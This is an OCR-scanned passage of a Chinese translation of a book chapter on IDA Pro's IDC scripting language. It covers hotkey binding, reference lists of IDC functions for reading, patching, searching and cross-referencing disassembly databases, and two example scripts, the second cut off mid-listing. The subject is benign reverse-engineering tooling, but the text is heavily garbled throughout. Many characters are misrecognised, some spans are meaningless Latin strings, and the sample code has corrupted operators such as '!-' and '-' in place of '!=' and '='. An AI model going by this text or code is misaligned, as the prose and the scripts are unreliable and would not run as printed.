局 变量 。 要 共 译 这 些 全 局 值 ， 可 以 将 数组 句柄 传递 给 要 求 访问 这 些 值 的 函数 ,或 者 要 求 请 求 访问 
这 些 值 的 饵 数 对 相关 数组 进行 名 称 查询 。 

IDC 全 局 数组 中 存储 的 值 会 在 执行 脚本 的 数据 库 中 永久 存在 。 你 可 以 通过 检查 CreateArray 
国 数 的 返回 值 , 测试 一 个 数组 是 否 存在 。 如 果 一 个 数组 中 存储 的 值 仅 适用 于 某 个 特定 的 脚本 , 那 
么 ,在 这 个 脚本 终止 前 ， 应 该 删除 该 数组 。 删 除数 组 可 以 确保 全 局 值 不 会 由 同一 个 脚本 的 上 一 次 
执行 传递 到 随后 的 执行 中 。 


15.3 ”关联 IDC 脚本 与 热 键 


有 时 开发 一 个 脚本 后 ， 你 会 惊奇 地 发 现 ， 你 必须 进行 一 两 次 键 击 才能 访问 这 个 脚本 。 这 时 ， 
你 可 能 希望 使 用 一 个 热 键 组 合 ， 以 迅速 激活 脚本 。 笠 好 IDA 提供 了 一 种 分 配 热 键 的 简单 方法 。 
每 次 启动 IDA， 它 都 会 执行 <IDADIR>/idcida.ide 中 的 脚本 。 这 个 脚本 的 默认 版 本 包含 一 个 空 的 
main 图 数 ， 因 此 ， 它 不 执行 任何 操作 。 为 了 将 热 键 与 脚本 关联 起 来 ， 你 需要 在 ida.idc 文件 中 添 
加 两 行 代码 。 在 第 一 行 代 码 中 ， 必 须 添加 一 个 includ 指令 ， 将 脚本 文件 包含 在 idaide 文件 中 。 
在 第 二 行 代 码 中 ， 必 须 在 main 函数 中 添加 一 个 对 AddHotkey 函数 的 调用 ， 将 特定 的 热 键 与 IDC 
脚本 关联 起 来 。 修 改 后 的 ida.ide 文件 如 下 所 示 。 


















































#include «idc.idc» 
#include «my amazing script.idc» 
static main() { 
AddHotkey("z", "MyAmazingFunc"); //Now 'z' invokes MyAmazingFunc 


j 
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如 果 你 尝试 与 脚本 关联 的 热 键 已 经 分 配给 男 一 项 IDA 操作 (菜单 热 键 或 插件 激活 热 键 )， 这 
时 ，AddHotkey 阴 数 将 悄 无 声息 地 和 失败， 除了 在 你 按 下 热 键 组 合 后 ， 郴 数 不 会 运行 外 ， 你 无 法 通 
过 其 他 方式 检测 到 这 种 失败 。 

这 里 你 需要 记 住 两 个 要 点 : 第 一 ，IDC 脚本 的 标准 存储 目录 为 <IDADIR>/idc; 第 二 , 不 能 将 
脚本 函数 命名 为 mains WREE DA 能 够 轻易 找到 脚本 , 可 以 将 它 复制 到 <IDADIR>y/idc 目录 中 。 
如 果 要 将 脚本 文件 存储 在 其 他 位 置 ， 你 需要 在 include 语句 中 指定 脚本 的 完整 路 径 。 在 测试 脚本 
时 ， 使 用 main 因数 以 独立 程序 的 方式 运行 脚本 会 有 好 处 。 但 是 ， 一 旦 你 准备 将 脚本 与 热 键 关 联 
起 来 ， 就 不 能 使 用 main 这 个 名 称 ， 因 为 它 会 与 ida.idc 中 的 main 函数 相互 冲突 。 必 须 重 命名 main 
函数 ， 并 在 调用 AddHotkey 时 使 用 新 的 名 称 。 
































15.4 ”有 用 的 IDC 函数 


现在 ， 你 已 经 拥有 了 编写 格式 完整 的 IDC 脚本 所 需 的 全 部 信息 。 但 是 ， 你 仍然 无 法 与 IDA 
进行 任何 有 益 的 交互 。IDC 提供 了 大 量 内 置 郧 数 用 于 以 各 种 方式 访问 数据 库 。IDA 帮助 系统 的 
Index of IDC functions (IDC KAA HR ) 主题 对 所 有 这 些 困 数 进行 了 一 定 程 度 的 说 明 。 多 数 情况 
下 ， 这 些 说 明 不 过 是 从 IDC 的 主要 包含 文件 ide.ide 中 复制 的 几 行 相关 内 容 。 在 学 习 IDC 的 过 程 
中 ， 午 懂 这 些 简短 的 说 明 是 一 个 今 人 诅 丧 的 经 历 。“ 在 IDC 中 ， 我 该 如 何 完 成 x? ”这 个 问题 通 
党 没有 明确 的 答案 。 要 想 完 成 某 个 任务 ， 最 常用 的 方法 是 浏览 IDC 的 函数 列表 ， 根 据 其 名 称 寻 
找 一 个 似乎 能 够 满足 需求 的 图 数 。 图 数 是 根据 用 途 来 命名 的 ,这 一 推 靳 并 非 总 是 成 立 。 例 如 , yr 
多 时 候 ， 从 数据 库 中 提取 信息 的 函数 叫做 GetXXX; THO ERU FR, PRU OESTE Get 前 级 。 更 
改 数据 库 的 函数 可 能 直接 叫做 SetXXX、MakeXXX 或 其 他 别 的 名 称 。 总体 来 说 , 如 果 你 想 要 使 用 IDC 
中 数 ， 请 经 常 浏览 函数 列表 并 仔细 阅读 函数 说 明 。 如 果 你 完全 不 知 所 措 ， 请 访问 Hex-Rays HJ xc 
Hetto", 

在 本 节 的 剩余 部 分 ， 我 们 将 介绍 一 些 有 用 (根据 我 们 的 经 验 ) 的 IDC mä. 2PTRAISUIBEONT 
它们 分 类 。 即 使 你 只 计划 使 用 Python 编写 脚本 ， 了 解 下 面 这 些 丽 数 仍 会 对 你 有 所 帮助 ， 因 为 
IDAPython 为 这 里 的 每 一 个 函数 提供 了 对 应 的 Python 函数 。 由 于 DA 帮助 系统 已 经 讨论 了 这 些 
国 数 ， 所 以 我 们 并 不 打算 介绍 每 一 个 IDC pr. 






































15.4.4 读 取 和 修改 数据 的 函数 


下 面 的 国 数 可 用 于 访问 数据 库 中 的 各 个 字 节 、 字 和 双 字 。 

口 long Byte(long addr)， 从 虚拟 地 址 addr AbEERC—A T E 1 Bo 

O long Word(long addr)， 从 虚拟 地 址 addr 处 读 取 一 个 字 (2 字 节 ) fü 

口 long Dword(long addr)， 从 虚拟 地 址 addr 处 读 取 一 个 双 字 (4 字 节 ) 值 。 

Q void PatchByte(long addr, long val)， 设 置 虚拟 地 址 addr 处 的 一 个 字 节 值 。 











D 该 支持 论坛 当前 的 地 址 为 http:/www.hex-rays.com/forum。 
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D void PatchWord(long addr, long val)， 设 置 虚拟 地 址 addr 处 的 一 个 字 值 。 

O void PatchDword(long addr, long val)， 设 置 虚拟 地 址 addr 处 的 一 个 双 字 值 。 

D bool isLoaded(long addr), ， 如 果 addr 包含 有 效 数 据 ， 则 返回 1， 和 否则 返回 0。 

在 读 取 和 写 入 数据 库 时 , 这 里 的 每 一 个 函数 都 考虑 到 了 当前 处 理 带 模块 的 字 节 顺序 (小 病 或 
AK). PatchXXX 函数 还 根据 被 调用 的 哨 数 ， 通 过 仪 使 用 适当 数量 的 低位 字 节 ， 将 所 提供 的 值 调 
整 到 适当 大 小 。 例 如 ， 调 用 PatchByte(0x401010，0x1234) 将 使 用 字 节 值 0x34 ( 0x1234 的 低位 字 
节 ) 修改 0x401010 位 置 。 如 果 在 用 Byte, Word 和 Dword 读 取 数据 库 时 提供 了 一 个 无 效 的 地 址 ， 
它们 将 分 别 返 回 值 0xFF、0xFFFF 和 0xFFFFFFFF。 因 为 你 没有 办 法 将 这 些 错误 值 与 存储 在 数据 库 
中 的 合法 值 区 分 开 来 ， 因 此 ， 在 尝试 从 数据 库 中 的 某 个 地 址 读 取 数据 之 前 ， 你 可 能 希望 调用 
isLoaded 函数 ， 以 确定 这 个 地 址 是 否 包 含 任何 数据 。 

HF IDA 在 刷新 反 汇 编 窗 口 时 “行为 古怪 ”， 你 可 能 会 发 现 ， 修 补 操 作 的 结果 并 不 会 立即 在 
窗口 中 显示 出 来 。 这 时 ,你 可 以 拖 动 深 动 市 离开 被 修补 的 位 置 ， 然 后 返回 这 个 位 置 ， 即 可 迫使 窗 
口 正确 进行 更 新 。 


15.4.2 用户 交互 函数 


为 了 进行 用 户 交 互 ， 需 要 鸣 悉 IDC 的 输入 /输出 图 数 。 下 面 详细 介绍 IDC 的 一 些 重要 的 接口 
Q void Message(string format, ...), 在 输出 窗口 打印 一 条 格式 化 消息 。 这 个 函数 类 似 于 
C 语 言 的 printf KZ, HEZ printf 风格 的 格式 化 字符 串 。 

O void print(...)， 在 输出 窗口 中 打印 每 个 参数 的 字符 串 表 示 形 式 。 

口 void Warning(string format，...)， 在 对 话 框 中 显示 一 条 格式 化 消息 。 

口 string AskStr(string default, string prompt)， 显 示 一 个 输入 框 ， 要 求 用 户 输入 一 个 字 

符 串 值 。 如 果 操 作成 功 ， 则 返回 用 户 的 字符 串 ; 如 果 对 话 框 被 取消 ， 则 返回 o. 

Q string AskFile(long doSave, string mask, string prompt)， 显 示 一 个 文件 选择 对 话 框 ， 
以 简化 选择 文件 的 任务 。 你 可 以 创建 新 文件 保存 数据 ( doSave=1 )， 或 选择 现 有 的 文件 旋 
取 数 据 ( doSave=0 )。 你 可 以 根据 mask (如 *.* 或 *.idc ) 过 滤 显 示 的 文件 列表 。 如 果 操 作 
成 功 ， 则 返回 选 定 文件 的 名 称 ; 如 采 对 话 框 被 取消 ， 则 返回 0。 

口 long AskYNCTong default, string prompt)， 用 一 个 答案 为 “是 ”或 “ 否 ” 的 问题 提示 用 户 ， 

突出 一 个 默认 的 答案 (1 为 是 ，0 为 否 ，-1 为 取消 )。 返回 值 是 一 个 表示 选 定 答案 的 整数 。 

O long ScreenEA() ， 返 回 当 前 光标 所 在 位 置 的 虚拟 地 址 。 

O bool Jump(long addr), ， 跳 转 到 反 汇 编 窗 口 的 指定 地 址 。 

为 IDC 没 有 任何 调试 工具 , 你 可 能 需要 将 Message 函数 作为 你 的 主要 调试 工具 。 其 他 几 个 
AskXXX 因数 用 于 处 理 更 加 专用 的 输入 ， 如 整数 输入 。 请 参考 帮助 系统 文档 了 解 可 用 的 AskXXX BR 
数 的 完整 列表 。 如 果 和 希望 创建 一 个 根据 光标 位 置 调整 其 行为 的 脚本 , 这 时 ，ScreenEA 函数 就 非常 
有 用 ， 因 为 你 可 以 通过 它 确定 光标 的 当前 位 置 。 同 样 ， 如 果 你 的 脚本 需要 将 用 户 的 注意 力 转移 到 
反 汇 编 代 码 清单 中 的 某 个 位 置 ， 也 需要 用 到 Jump mä, 
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15.4.3 字符 串 操 纵 函 效 


虽然 简单 的 字符 串 赋值 和 拼接 操作 可 以 通过 IDC 中 的 基本 运算 符 实 现 ， 但 是 ， 更 加 复杂 的 

操作 必须 使 用 字符 串 操 纵 隐 数 实现 ， 这 些 函 数 如 下 所 示 。 

O string form(string format，...)//preIDA5.6， 返 回 一 个 新 字符 串 ， 该 字符 串 根 据 所 提供 
的 格式 化 字符 串 和 值 进行 格式 化 。 这 个 也 数 基本 上 等 同 于 C 语 言 的 sprintf KX 

Q string sprintf(string format,...)//IDA5.6+, TE IDAS.6 P, sprintf 用 于 替代 form CE 
见 上 面 )。 

O long atol(string val)， 将 十 进 制 值 val 转换 成 对 应 的 整数 值 。 

O long xtol(string val)， 将 十 六 进 制 值 val (可 选择 以 0x 开头 ) 转换 成 对 应 的 整数 值 。 

D string ltoa(long val, long radix)， 以 指定 的 radix (2, 8, 10 2X 16 ) 返回 val Die 
ITRE 

Q long ord(string ch)， 返回 单字 符 字 符 串 ch 的 ASCII 值 。 

口 long strlen(string str), 返回 所 提供 字符 串 的 长 度 。 

O long strstr(string str, string substr)， 返 回 str 中 substr 的 索引 。 如 果 没 有 发 现 子 
字符 串 ， 则 返回 -1。 

Q string substr(string str, long start, long end), REEE str 中 由 start 到 end-1 
位 置 的 字符 的 子 字 和 人 符 串 。 如 果 使 用 分 厂 CIDAS.6 及 更 高 版 本 )， 此 函数 等 同 于 
strLstart:end]。 

如 前 所 述 ，IDC 中 没有 任何 字符 数据 类 型 ， 它 也 不 支持 任何 数组 语法 。 如 果 你 想 要 遍历 字符 

串 的 每 个 字符 ， 儿 须 把 字符 串 中 的 每 个 字符 当成 连续 的 单字 符 子 字符 串 处 理 。 


15.4.4 文件 输入 /输出 函数 


输出 窗口 并 不 总 是 显示 脚本 输出 的 理想 位 置 。 对 于 生成 大 量 文 本 或 二 进 制 数据 的 脚本 , 你 可 
能 希望 将 其 结果 输出 到 磁盘 文件 上 。 我 们 已 经 讨论 了 如 何 使 用 AskFile 函数 要 求 用 户 输入 文件 名 。 
是 ，AskFile 仪 返回 一 个 包含 文件 名 的 字符 串 值 。IDC 的 文件 处 理 函 数 如 下 所 示 。 
口 long fopen(string filename, string mode)， 返 回 一 个 整数 文件 句柄 ( 如 果 发 生 错 误 ， 
则 返回 0), 供 所 有 IDC 文件 输入 /输出 隆 数 使 用 。 mode 参数 与 C 语 言 的 fopen pe HI oi 
模式 (r 表示 读 取 ，w 表示 写 入 ， 等 等 ) 类 似 。 
D void fclose(long handle), JH] fopen 中 文件 句柄 指定 的 文件 。 
D long filelength(long handle)， 返 回 指定 文件 的 长 度 ， 如 果 发 生 鲁 误 ， 则 返回 -1。 
O long fgetc(long handle), ， 从 给 定 文 件 中 该 取 一 个 字 节 。 如 果 发 生 错 误 ， 则 返回 -1。 
Q long fputc(long val, long handle) ， 写 入 一 个 字 节 到 给 定 文 件 中 。 如 果 操 作成 功 ， 则 返 
回 0; 如 果 发 生 错 误 ， 则 返回 -1。 
口 long fprintf(long handle, string format，...)， 将 一 个 格式 化 字符 串 写 人 到 给 定 文件 中 。 
口 long writestr(long handle, string str)， 将 指定 的 字符 串 写 人 到 给 定 文件 中 。 
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O string/long readstr(long handle), ， 从 给 定 文件 中 该 取 一 个 字符 串 。 这 个 函数 谈 取 到 下 
一 个 换行 符 为 止 的 所 有 字符 ( 包括 非 ASCII 字符 )， 包 括 换 行 符 本 身 CASCILOxA )。 如 果 
操作 成 功 ， 则 返回 字符 串 ; 如 果 读 取 到 文件 结尾 ， 则 返回 -1。 

口 long writelong(long handle, long val, long bigendian), 使 用 大 端 (bigendian=1 ) 或 
Jim (bigendian=0 ) 学 市 顺 友 将 一 个 4 字 市 整数 号 人 到 给 定 文件 。 

口 long readlong(long handle, long bigendian), 使 用 大 妆 (bigendian=1 ) 或 小 端 (bigendian=0 ) 
字 节 有 顺序 从 给 定 的 文件 中 旋 取 一 个 4 字 下 整数 。 

口 long writeshort(long handle, long val, long bigendian) ， 使 用 大 端 (bigendian-1) 或 
Ah (bigendian-0) 字 节 顺序 将 一 个 2 字 节 整数 写 和 人 到 给 定 的 文件 。 

口 long readshort(1ong handle, long bigendian) , 使 用 大 端 ( bigendian=1 ) 或 小 端 ( bigendian=0 ) 
字 节 有 顺序 从 给 定 的 文件 中 旋 取 一 个 2 字 下 整数 。 

O bool loadfile(long handle, long pos, long addr, long length) ， 从 给 定 文件 的 pos 位 
SCD length 数量 的 字 节 ， 并 将 这 些 字 节 写 人 到 以 addr 地 址 开头 的 数据 库 中 。 

口 bool savefile(long handle, long pos, long addr, long length), ， 将 以 addr 数据 库 地 址 
开头 的 length 数量 的 字 节 写 人 给 定 文 件 的 pos 位 置 。 


15.4.5 ”操纵 数据 库 名 称 


在 脚本 中 ， 你 经 常 需要 操纵 已 命名 的 位 置 。 下 面 的 IDC RAUH FA IDA 数据 库 中 已 命名 
的 位 置 。 

Q string Name(long addr), 返回 与 给 定 地 址 有 关 的 和 名称， 如 果 该 位 置 没 有 和 名称， 则 返回 空 
字符 串 。 如 有 果 名 称 被 标记 为 局 部 名 称 ， 这 个 函数 并 不 返回 用 户 定义 的 名 称 。 

口 string NameEx(long from, long addr), 返回 与 addr 有 关 的 名 称 。 如 果 该 位 置 没 有 名 称 ， 
则 返回 空 字符 串 。 如 果 frm 是 一 个 同样 包含 addr 的 函数 中 的 地 址 ， 则 这 个 函数 返回 用 户 
定义 的 局 部 名 称 。 

口 bool MakeNameEx(long addr, string name, long flags), 将 给 定 的 名 称 分 配给 给 定 的 地 
址 。 该 名 称 使 用 flags 位 掩 码 中 指定 的 属性 创建 而 成 。 这 些 标志 在 帮助 系统 中 的 
MakeNameEx 文档 中 有 记载 描述 ， 可 用 于 指定 各 种 属性 ， 如 名 称 是 局 部 名 称 还 是 公共 名 称 、 
名 称 是 否 应 在 名 称 窗口 中 列 出 。 

口 1ong LocByName(string name)， 返 回 一 个 位 置 ( 名称 已 给 定 ) 的 地 址 。 如 果 数 据 库 中 没有 
这 个 名 称 ， 则 返回 BADADDR (-1). 

口 long LocByNameEx(long funcaddr, string 1ocalname)， 在 包含 funcaddr 的 函数 中 搜索 给 
定 的 局 部 名 称 。 如 果 给 定 的 图 数 中 没有 这 个 名 称 ， 则 返回 BADADDR (-1). 


15.4.6 ”处理 函数 的 函数 


许多 脚本 专用 于 分 析 数 据 库 中 的 函数 。IDA 为 经 过 反 汇 编 的 晒 数 分 配 大 量 属性 , 如 函数 局 部 
变量 区 域 的 大 小 、 函 数 的 参数 在 运行 时 栈 上 的 大 小 。 下 面 的 IDC 也 数 可 用 于 访问 与 数据 库 中 的 
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Q long GetFunctionAttr(long addr, long attrib)， 返 回 包含 给 定 地 址 的 函数 的 被 请 求 的 属 
性 。 请 参考 DC 帮助 文档 了 解 属性 常量 。 例 如， 要 查找 一 个 函数 的 结束 地 址 ， 可 以 使 用 
GetFunctionAttr(addr, FUNCATTR END); 。 

Q string GetFunctionName(long addr)， 返 回 包含 给 定 地 址 的 函数 的 名 称 。 如 果 给 定 的 地 址 
并 不 属于 一 个 图 数 ， 则 返回 一 个 空 字符 串 。 

Q long NextFunction(long addr)， 返 回 给 定 地 址 后 的 下 一 个 函数 的 起 始 地 址 。 如 果 数 据 库 
中 给 定 地 址 后 没有 其 他 了 水 数 ， 则 返回 -1。 

Q long PrevFunction(long addr)， 返 回 给 定 地 址 之 前 距离 最 近 的 函数 的 起 始 地 址 。 如 果 在 
给 定 地 址 之 前 没有 少数 ， 则 返回 -1。 

根据 函数 的 名 称 ， 使 用 LocBy Name 函数 查找 该 函数 的 起 始 地 址 。 


15.4.7 Jans X. 5| FHERZN 


交叉 引用 已 在 第 9 章 讨 论 过 。IDC 提供 各 种 函数 来 访问 与 指令 有 关 的 交叉 引用 信息 。 要 确 
定 哪些 函数 能 够 满足 你 的 脚本 的 要 求 ， 可 能 有 些 令 人 困惑 。 它 要 求 你 确定 : 你 是 否 有 兴趣 跟从 
离开 给 定 地 址 的 流 ， 是 否 有 兴趣 迭代 引用 给 定 地 址 的 所 有 位 置 。 下 面 我 们 将 介绍 执行 上 述 两 种 
操作 的 函数 。 其 中 几 个 函数 用 于 支持 对 一 组 交 又 引用 进行 迭代 。 这 些 隐 数 支持 交叉 引用 序列 的 
概念 ， 并 需要 一 个 current 交叉 引用 ， 以 返回 一 个 next 交叉 引用 。 使 用 交叉 引用 迭代 吉 的 示例 
请 参见 15.53. 
O long Rfirst(long from)， 返 回 给 定 地 址 回 其 转交 控制 权 的 第 一 个 位 置 。 如 采 给 定 的 地 址 
没有 引用 其 他 地 址 ， 则 返回 BADADDR (-1). 
口 long Rnext(long from, long current)， 如 果 current 已 经 在 前 一 次 调用 Rfirst 或 Rnext 
时 返回 , 则 返回 给 定 地 址 ( from ) 转交 控制 权 的 下 一 个 位 置 。 如果 没有 其 他 交叉 引用 存在 ， 
则 返回 BADADDR. 
O long XrefType()， 返 回 一 个 第 量 ， 说明 某 个 交叉 引用 查询 函数 ( 如 Rfirst ) 返回 的 最 后 
一 个 交叉 引用 的 类 型 。 对 于 代码 交 又 引用， 这些 常量 包括 f1 CN ( 近 调 用 ). £1 CF Cei 
用 )、fl_JN( 近 跳 转 )、fl_JF (和 远 跳 转 ) 和 f1_F (普通 顺序 流 )。 
口 long RfirstB(long to)， 返 回转 交 控 制 权 到 给 定 地 址 的 第 一 个 位 置 。 如 果 不 存 在 对 给 定 
地 址 的 交 义 引用 ， 则 返回 BADADDR (211 
口 long RnextB(long to, long current)， 如 果 current 已 经 在 前 一 次 调用 RfirstB 或 RnextB 
时 返回 ， 则 返回 下 一 个 转交 控制 权 到 给 定 地 址 〈to ) 的 位 置 。 如 果 不 存在 其 他 对 给 定位 
置 的 交叉 引 用 ， 则 返回 BADADDR (-1). 
每 次 调用 一 个 交叉 引 用 也 数 , IDA 都 会 设置 一 个 内 部 IDC 状态 变量 , 指出 返回 的 最 后 一 个 交 
叉 引 用 的 类 型 ,如 果 需 要 知道 你 收 到 的 交叉 引用 的 类 型 ,那么 在 调用 其 他 交叉 引用 查询 函数 之 前 ， 
必须 调用 XrefType AŽ 
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15.4.8 数据 交叉 引用 函数 


访问 数据 交叉 引用 信息 的 函数 与 访问 代码 交叉 引用 信息 的 困 数 非常 类 似 。 这 些 困 数 如 下 
Br o 
O long Dfirst(long from)， 返 回 给 定 地 址 引用 一 个 数据 值 的 第 一 个 位 置 。 如 采 给 定 地 址 没 
有 引用 其 他 地 址 ， 则 返回 BADADDR (-1). 
口 1ong Dnext(long from, long current)， 如 果 current 已 经 在 前 一 次 调用 Dfirst 或 Dnext 
时 返回 ， 则 返回 给 定 地 址 (from ) 回 其 引用 一 个 数据 值 的 下 一 个 位 置 。 如 采 没 有 其 他 交叉 
引用 存在 ， 则 返回 BADADDR. 
O long XrefType()， 返 回 一 个 常量 ,说 明 某 个 交叉 引用 查询 消 数 (如 Dfirst ) 返回 的 最 后 
一 个 交叉 引用 的 类 型 。 对 于 数据 交叉 引用 , 这 些 常量 包括 dr_0( 提供 的 偏 移 量 )、dr_W( 数 
据 写 入 ) 和 dr R (数据 读 取 )。 
O long DfirstB(long to)， 返 回 将 给 定 地 址 作为 数据 引用 的 第 一 个 位 置 。 如 果 不 存 在 引用 
给 定 地 址 的 交叉 引用 ， 则 返回 BADADDR ( -1 )。 
口 1ong DnextB(long to, long current), WÈ currnet 已 经 在 前 一 次 调用 DfristB 或 DnextB 
时 返回 ， 则 返回 将 给 定 地 址 〈to ) 作为 数据 引用 的 下 一 次 位 置 。 如 果 没 有 其 他 对 给 定 地 
址 的 交叉 引用 存在 ， 则 返回 BADADDR。 
和 代码 交 又 引用 一 样 ， 如 果 需 要 知道 你 收 到 的 交 又 引用 的 类 型 ,那么 在 调用 男 一 个 交 又 引用 
查询 函数 之 前 ， 必 须 调用 XrefType RAŽ 


15.4.9 ”数据 库 操 纵 了 水 数 


有 大 量 陶 数 可 用 于 对 数据 库 的 内 容 进行 格式 化 。 这 些 隐 数 如 下 所 示 。 

口 void MakeUnkn(long addr, long flags)， 取 消 位 于 指定 地 址 的 项 的 定义 。 这 里 的 标志 (ZS 
JL IDC 的 MakeUnkn 文档 ) 指出 是 否 也 取消 随后 的 项 的 定义 ， 以 及 是 否 删除 任何 与 取消 定 
义 的 项 有 关 的 名 称 。 相 关 函 数 MakeUnknown 允许 你 取消 大 块 数据 的 定义 。 

口 long MakeCode(long addr), ， 将 位 于 指定 地 址 的 字 节 转换 成 一 条 指令 。 如 果 操 作成 功 ， 则 
返回 指令 的 长 度 ， 和 否则 返回 o. 

Q bool MakeByte(long addr), ， 将 位 于 指定 地 址 的 项 目 转换 成 一 个 数据 字 节 。 类 似 的 函数 还 
包括 MakeWord 和 MakeDword。 

Q bool MakeComm(1ong addr, string comment)， 在 给 定 的 地 址 处 添加 一 条 常规 注释 。 

口 bool MakeFunction(long begin, long end), 将 由 begin 到 end 的 指令 转换 成 一 个 也 数 。 
如 果 end 被 指定 为 BADADDR ( -1), IDA 会 尝试 通过 定位 函数 的 返回 指令 ,来 日 动 确 定 
该 函数 的 结束 地 址 。 

O bool MakeStr(long begin, long end), ， 创 建 一 个 当前 字符 串 (由 GetStringType 返回 ) 类 
型 的 字符 串 , 涵盖 由 begin 到 end-1 ZERAT o 如果 end 被 指定 为 BADADDR IDA 
会 尝试 自动 确定 字符 串 的 结束 位 置 。 
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有 许多 其 他 MakeXXX 函数 可 提供 类 似 于 上 述 函 数 的 操作 。, 请 参考 IDC 文档 资料 了 解 所 有 这 些 
SEA 


15.4.10 ”数据 库 搜索 函数 


在 IDC F, IDA 的 绝 大 部 分 搜索 功能 可 通过 各 种 FindXXX 函数 来 实现 ， 下 面 我 们 将 介绍 
其 中 一 些 函 数 。FindXXX 函数 中 的 flags 参数 是 一 个 位 掩 码 ， 可 用 于 指定 查找 操作 的 行为 。3 
个 最 为 稼 用 的 标志 分 别 为 SEARCH_DOWN， 它 指示 搜索 操作 扫描 高 位 地 址 ; SEARCH_NEXT， 它 略 
过 当前 匹配 项 ， 以 搜索 下 一 个 匹配 项 ; SEARCH_CASE， 它 以 区 分 大 小 写 的 方式 进行 二 进 制 和 文 
本 搜索 。 
口 long FindCode(long addr, long flags)， 从 给 定 的 地 址 搜索 一 条 指令 。 
口 long FindData(long addr, long flags)， 从 给 定 的 地 址 搜索 一 个 数据 项 。 
口 1ong FindBinary(long addr, long flags, string binary)， 从 给 定 的 地 址 搜索 一 个 字 节 
序列 。 字 符 串 binary 指定 一 个 十 六 进 制 字 节 序列 值 。 如 果 没 有 设置 SEARCH_CASE， 且 一 个 
学 方 值 指定 了 一 个 大 写 或 小 写 ASCI 字 母 ， 则 搜索 仍然 会 匹配 对 应 的 互补 但 。 例 如 ,，“41 
42” 将 匹配 “61 62”( 和 “61 42”)， 除 非 你 设置 了 SEARCH CASE 标志 。 
OQ long FindText(long addr, long flags, long row, long column, string text), Æ 
的 地 址 ， 从 给 定 行 〈row ) 的 给 定 列 搜索 字符 串 text。 注 意 ， 某 个 给 定 地 址 的 反 汇 编 文 本 
可 能 会 跨越 几 行 ， 因 此 ， 你 需要 指定 搜索 应 从 哪 一 行 开始 。 
还 要 注意 的 是 ，SEARCH_NEXT 并 未 定义 搜索 的 方 问 ， 根 据 SEARCH DOWN 标志 ， 其 方 回 可 能 
上 也 可 能 向 下 。 此 外 , 如 果 没 有 设置 SEARCH NEXT, H addr 位 置 的 项 与 搜索 条 件 匹 配 , 则 FindXXX 
国 数 很 可 能 会 返回 addr 参数 传递 给 该 函数 的 地 址 。 

















15.4.11 反 汇 编 行 组 件 


许多 时 候 , 我 们 需要 从 反 汇 编 代码 清单 的 反 汇 编 行 中 提取 出 文本 或 文本 的 某 个 部 分 。 下面 的 
函数 可 用 于 访问 反 汇 编 行 的 各 种 组 件 。 

D string GetDisasm(long addr)， 返 回 给 定 地 址 的 反 汇 编 文 本 。 返 回 的 文本 包括 任何 注释 ， 
但 不 包括 地 址 信息 。 

Q string GetMnem(long addr)， 返 回 位 于 给 定 地 址 的 指令 的 助 记 符 部 分 。 

D string GetOpnd(long addr, long opnum), ， 返 回 指定 地 址 的 指定 操作 数 的 文本 形式 。IDA 
以 零 为 起 始 编号 ， 从 左 回 右 对 操作 数 编号 。 

口 1ong GetOpType(long addr, long opnum), ， 返 回 一 个 整数 ， 指 出 给 定 地 址 的 给 定 操作 数 的 
类 型 。 请 参考 Get0pType 的 IDC 文 档 ， 了 解 操 作 数 类 型 代码 。 

口 1ong GetOperandValue(long addr, long opnum), ， 返 回 与 给 定 地 址 的 给 定 操作 数 有 关 的 整 
数值 。 返 回 值 的 性 质 取 决 于 Get0pType 指定 的 给 定 操作 数 的 类 型 。 
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D string CommentEx(long addr, long type)， 返 回 给 定 地 址 处 的 注释 文本 。 如 果 type 为 0， 
则 返回 篆 规 注释 的 文本 ; 如 果 type 为 1， 则 返回 可 重复 注释 的 文本 。 如 果 给 定 地 址 处 没 
有 注释 ， 则 返回 一 个 空 字符 串 。 


15.5 IDC 脚本 示例 


现在 ， 分 析 一 些 完 成 特定 任务 的 脚本 示例 会 很 有 用 。 在 本 章 的 剩余 部 分 ,我 们 将 介绍 一 些 相 
当 津 见 的 情形 ， 说 明 如 何 使 用 脚本 来 处 理 与 数据 库 有 关 的 问题 。 





15.5.1 FIZERA 


FERETE A RAET. 例如， 生成 以 某 个 特定 函数 为 根 的 调用 树 ， 生 成 一 个 函数 
的 控制 流程 图 ， 或 者 分 析 数 据 库 中 每 个 函数 的 栈 帆 。 代 人 码 清 单 15-1 中 的 脚本 遍历 数据 库 中 的 每 
一 个 函数 ,并 打 纯 出 每 个 函数 的 基本 信息 ,包括 函数 的 起 娘 和 结束 地 址 、 孙 数 参数 的 大 小 、 卫 数 
的 局 部 变量 的 大 小 。 所 有 输出 全 部 在 输 口 窗口 中 显示 。 


代码 清单 15-1 ”函数 枚 举 脚本 
include «idc.idc» 
static main() { 
auto addr, end, args, locals, frame, firstArg, name, ret; 
addr = 0; 
for (addr = NextFunction(addr); addr !- BADADDR; addr = NextFunction(addr)) { 
name - Name(addr); 
end - GetFunctionAttr(addr, FUNCATTR END); 
locals - GetFunctionAttr(addr, FUNCATTR FRSIZE); 











frame - GetFrame(addr); // retrieve a handle to the function's stack frame 
ret - GetMemberOffset(frame, " r"); // " r" is the name of the return address 
if (ret -- -1) continue; 


firstArg = ret + 4; 
args - GetStrucSize(frame) - firstArg; 
Message("Function: Xs, starts at Xx, ends at %x\n", name, addr, end); 
Message(" | Local variable area is Xd bytes Wn", locals); 
Message(" ^ Arguments occupy Xd bytes (Xd args)\n", args, args / 4); 
} 
J 


这 个 脚本 使 用 IDC Di. ES 4 3824 PR, ELA TS PUT T ILI] AJA ( GetFrame )， 确 
Rep ah (GetStrucSize), JffgxE Rëm ON re iis Init Bes ( GetMemberOffset )。 
国 数 的 第 一 个 参数 占用 保存 的 返回 地 址 后 面 的 4 Ten. BAI SS rënnen rz 
数 与 栈 帧 结束 部 分 之 间 的 空间 。 由 于 IDA 无 法 为 导入 的 函数 生成 栈 帧 ， 这 个 脚本 检查 函数 的 
栈 帧 中 是 否 包含 一 个 已 保存 的 返回 地 址 ， 以 此 作为 一 种 简单 的 方法 ， 确 定 对 某 个 导入 羡 数 的 
调用 。 
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15.5.2 MHS 


你 可 能 想 要 枚 举 给 定 函 数 中 的 每 一 条 指令 。 代 码 清 单 15-2 中 的 脚本 可 用 于 计算 光标 当前 所 
在 位 置 的 水 数 所 包含 的 指令 的 数量 。 


代码 清单 15-2 ”指令 枚 举 脚本 
#include «idc.idc» 
static main() { 
auto func, end, count, inst; 
(1) func = GetFunctionAttr(ScreenEA(), FUNCATTR_START); 
if (func != -1) { 
e end = GetFunctionAttr(func, FUNCATTR END); 
count = 0; 
inst - func; 
while (inst < end) { 
count; 
